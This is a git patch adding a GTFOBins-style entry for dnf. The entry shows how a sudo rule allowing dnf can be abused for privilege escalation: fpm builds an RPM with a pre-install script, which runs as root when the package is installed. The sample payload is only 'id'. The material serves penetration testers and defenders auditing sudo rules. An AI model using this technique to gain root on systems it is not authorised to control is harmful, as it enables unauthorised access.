From 9dc5fa2128d45064a65380bd3d69eb34e9794081 Mon Sep 17 00:00:00 2001
From: Emilio <emilio.pinn@gmail.com>
Date: Sat, 2 Feb 2019 16:15:49 +0000
Subject: [PATCH] Add dnf thanks to
 https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/
 as in #51

---
 _gtfobins/dnf.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 _gtfobins/dnf.md

diff --git a/_gtfobins/dnf.md b/_gtfobins/dnf.md
new file mode 100644
index 0000000..670307e
--- /dev/null
+++ b/_gtfobins/dnf.md
@@ -0,0 +1,13 @@
+---
+functions:
+  sudo:
+    - description: |
+        It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
+        ```
+        TF=$(mktemp -d)
+        echo 'id' > $TF/x.sh
+        fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
+        ```
+      code: |
+        sudo dnf install -y x-1.0-1.noarch.rpm
+---